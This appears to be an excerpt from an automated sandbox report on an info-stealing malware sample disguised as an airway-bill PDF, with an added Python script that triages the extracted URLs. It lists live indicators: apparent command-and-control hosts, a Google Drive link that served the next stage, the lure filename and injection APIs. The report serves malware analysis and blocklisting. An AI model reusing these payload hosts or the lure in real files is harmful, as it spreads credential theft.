                      Source: firefox.exe, 00000017.00000002.3085974166.0000000019B08000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://marposet.shop/
                      Source: proquota.exe, 00000012.00000002.3372194719.00000000055CC000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000002.3371539991.000000000319C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9G
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168688246.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168238016.0000000021EE1000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000002.2522133724.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3372194719.0000000004B9C000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000000.2753377461.000000000276C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3085974166.00000000193FC000.00000004.80000000.00040000.00000000.sdmp, hdcleziT.pif.0.drString found in binary or memory: http://ocsp.comodoca.com0$
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: WQzLddwiZR.exe, 00000015.00000002.3370132243.000000000096B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.missvet.net
                      Source: WQzLddwiZR.exe, 00000015.00000002.3370132243.000000000096B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.missvet.net/htux/
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168688246.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2228426498.0000000021F8B000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168238016.0000000021EE1000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000002.2522133724.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3372194719.0000000004B9C000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000000.2753377461.000000000276C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3085974166.00000000193FC000.00000004.80000000.00040000.00000000.sdmp, hdcleziT.pif.0.drString found in binary or memory: http://www.pmail.com0
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.000000000071B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002090D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208E4000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.000000000071B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk145987165927
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1sqV
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000787000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1&export=download
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1&export=download6
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.000000000076E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1&export=downlo
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: cmd.exe, 00000009.00000002.2427580879.0000000003111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ch2sh/BatCloak
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/o
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: proquota.exe, 00000012.00000003.2967927181.0000000007660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10336
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: proquota.exe, 00000012.00000002.3369025968.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.6:49711 version: TLS 1.2
                      Source: Yara matchFile source: Process Memory Space: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe PID: 5016, type: MEMORYSTR
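                      The URL list above mixes three very different things: CRL/OCSP/CPS endpoints that come from the Authenticode certificate chain embedded in the sample (DigiCert, Sectigo, Comodo), search-engine and login.live.com strings that sit in browser and Windows process memory scraped by the stealer, the Google Drive link from which the first stage pulled its payload, and the handful of hosts (missvet.net, marposet.shop) that are the actual C2 candidates. The following script is an added triage example, not part of the Joe Sandbox report; it works on a constructed subset of the strings listed above, splits URLs that a strings scan glued together, strips the ASN.1 length bytes ("0", "0C", "0#") that follow certificate URLs, and buckets each host. The allowlists of certificate and browser hosts are assumptions for this example and should be extended per environment.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a subset of the "String found in binary or memory" values above.
SAMPLE_STRINGS = [
    "http://crl3.digicert.com/DigiCertTrustedRootG4.crl0",
    "http://ocsp.sectigo.com0C",
    "https://sectigo.com/CPS0",
    "http://marposet.shop/",
    "http://missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9G",
    "http://www.missvet.net/htux/",
    "https://duckduckgo.com/ac/?q=",
    "https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search",
    "https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1",
    "https://drive.usercontent.google.com/download?id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1&export=download",
    "https://login.live.com/oauth20_desktop.srf?lc=1033",
    "https://github.com/ch2sh/BatCloak",
]

# CRL/OCSP/CPS endpoints from the signing chain. The trailing "0", "0C", "0#" on
# these are ASN.1 bytes the strings scan glued onto the URL, so match by prefix
# instead of trusting the parsed hostname (which would read "ocsp.sectigo.com0c").
CERT_INFRA = re.compile(
    r"^https?://((?:crl\d*|ocsp|crt)\.(?:digicert|sectigo|comodoca)\.com|sectigo\.com)")
# Hosts that normally live in browser / Windows process memory; assumed allowlist.
BENIGN_APP_HOSTS = {
    "duckduckgo.com", "ac.ecosia.org", "cdn.ecosia.org", "www.ecosia.org",
    "ch.search.yahoo.com", "login.live.com",
}
DRIVE_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
DRIVE_ID = re.compile(r"[?&]id=([A-Za-z0-9_-]+)")


def split_glued(s):
    """A strings scan concatenates adjacent URLs; split before every scheme."""
    return [p for p in re.split(r"(?=https?://)", s) if p]


def classify(url):
    """Return (category, host) for one URL."""
    m = CERT_INFRA.match(url)
    if m:
        return "cert-infra", m.group(1)
    host = (urlparse(url).hostname or "").lower()
    if host in DRIVE_HOSTS:
        return "stage-download", host
    if host in BENIGN_APP_HOSTS:
        return "benign-app-strings", host
    if host == "github.com":
        return "tooling-reference", host
    return "c2-candidate", host


def triage(strings):
    """Map category -> set of hosts from raw 'String found in memory' values."""
    buckets = {}
    for s in strings:
        for url in split_glued(s):
            cat, host = classify(url)
            buckets.setdefault(cat, set()).add(host)
    return buckets


def drive_file_ids(strings):
    """Google Drive file IDs, i.e. where the next stage was hosted."""
    return {m.group(1) for s in strings for m in DRIVE_ID.finditer(s)}


if __name__ == "__main__":
    for cat, hosts in sorted(triage(SAMPLE_STRINGS).items()):
        print(f"{cat:20} {', '.join(sorted(hosts))}")
    print("drive ids:", drive_file_ids(SAMPLE_STRINGS))
```

Only the "c2-candidate" bucket and the Drive file ID should go into blocklists; the certificate endpoints are shared with every legitimately signed binary and the search-engine URLs would block the user's browser.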

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 15.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2725067092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2805235368.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3368003513.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2788912013.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2807095527.000000001D920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3370452478.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2699018066.0000000024B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3371188324.0000000005980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2702788304.0000000024FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Source: initial sampleStatic PE information: Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B3824C NtReadVirtualMemory
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B384BC NtUnmapViewOfSection
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B3DAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B3DA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B3DBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Code function: 0_2_02B38BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
